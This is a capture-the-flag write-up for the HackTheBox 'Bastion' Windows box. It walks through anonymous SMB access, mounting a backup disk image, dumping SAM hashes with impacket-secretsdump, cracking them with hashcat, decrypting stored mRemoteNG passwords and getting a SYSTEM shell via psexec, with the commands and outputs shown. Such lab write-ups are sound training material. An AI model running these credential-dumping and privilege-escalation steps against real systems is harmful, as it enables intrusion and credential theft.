Bastion Writeup

22 February 2023 #CTF #HTB #box #easy #windows

bastion info

Enumeration

Do you have a moment to talk about our lord and savior nmap:

$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap 10.10.10.134
[...]
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
|   256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_  256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-02-10T22:38:01+01:00
|_clock-skew: mean: -19m58s, deviation: 34m34s, median: 0s
| smb2-time: 
|   date: 2023-02-10T21:37:57
|_  start_date: 2023-02-10T21:30:22
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
[...]

SMB

Let's try listing the shares anonymously:

$ smbclient -NL 10.10.10.134

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

There is a Backups share, let's mount it (you'll need the cifs-utils package on Debian):

$ mkdir -p mnt/smb
$ sudo mount -t cifs -o username=asdf,password=asdf //10.10.10.134/Backups mnt/smb

Browsing through the share, we can find 2 .vhd files, which are basically disk partitions:

$ ls WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
[...]

We'll only look at the second vhd file since the first one is the boot partition so not that interesting.

We could copy the file to a Windows machine and mount it that way but a much simpler (and faster) option is to use the guestfs tools to mount the disk image inside our Linux VM directly:

$ mkdir mnt/vhd
$ sudo guestmount -a mnt/smb/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro mnt/vhd

You'll need to sudo apt install -y libguestfs-tools if the package isn't already installed.

Foothold

Now that we have mounted the backup image, we can look at the files:

$ cd mnt/vhd
$ ls -lA
total 2096729
drwxrwxrwx 1 root root          0 Feb 22  2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root         24 Jun 10  2009  autoexec.bat
-rwxrwxrwx 1 root root         10 Jun 10  2009  config.sys
lrwxrwxrwx 2 root root         14 Jul 14  2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22  2019  pagefile.sys
drwxrwxrwx 1 root root          0 Jul 14  2009  PerfLogs
drwxrwxrwx 1 root root       4096 Jul 14  2009  ProgramData
drwxrwxrwx 1 root root       4096 Apr 12  2011 'Program Files'
drwxrwxrwx 1 root root          0 Feb 22  2019  Recovery
drwxrwxrwx 1 root root       4096 Feb 22  2019 'System Volume Information'
drwxrwxrwx 1 root root       4096 Feb 22  2019  Users
drwxrwxrwx 1 root root      16384 Feb 22  2019  Windows

This looks a lot like the root filesystem of a Windows box. Knowing this, we can go to Windows/System32/config to find the SAM and the SYSTEM hives and extract NTLM hashes of local user accounts:

$ cd Windows/System32/config
$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

We see that the Administrator hash is the same as the Guest user, which most likely means this isn't the real Administrator password.

Anyway, let's take it over to hashcat:

$ hashcat -m 1000 26112010952d963c8dc4217daec986d9 /opt/rockyou.txt
[...]
26112010952d963c8dc4217daec986d9:bureaulampje
[...]

We can SSH in with L4mpje:bureaulampje.

Privesc

In C:\Program Files (x86), we find a remote access software:

l4mpje@BASTION C:\Program Files (x86)>dir
 Volume in drive C has no label.
 Volume Serial Number is 1B7D-E692

 Directory of C:\Program Files (x86)

22-02-2019  14:01    <DIR>          .
22-02-2019  14:01    <DIR>          ..
16-07-2016  14:23    <DIR>          Common Files
23-02-2019  09:38    <DIR>          Internet Explorer
16-07-2016  14:23    <DIR>          Microsoft.NET
22-02-2019  14:01    <DIR>          mRemoteNG
[...]

After digging through the docs, we learn that there is a config file located in C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml:

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" [...]>

There are passwords in this file, but they are encrypted. However, the encryption key is static, as discused in this blog post (and the project is open-source) so it is trivial to decrypt the passwords with this python script:

$ ./decrypt.py confCons.xml
Name: DC
Hostname: 127.0.0.1
Username: Administrator
Password: thXLHM96BeKL0ER2

Name: L4mpje-PC
Hostname: 192.168.1.75
Username: L4mpje
Password: bureaulampje

With the Admin password we can SSH in or psexec:

$ impacket-psexec administrator:thXLHM96BeKL0ER2@10.10.10.134
[...]
C:\Windows\system32> whoami
nt authority\system

Key Takeaways

You can mount .vhd images on Linux
When you have full access to a Windows filesystem, dump SAM
After foothold, look in common directories for installed software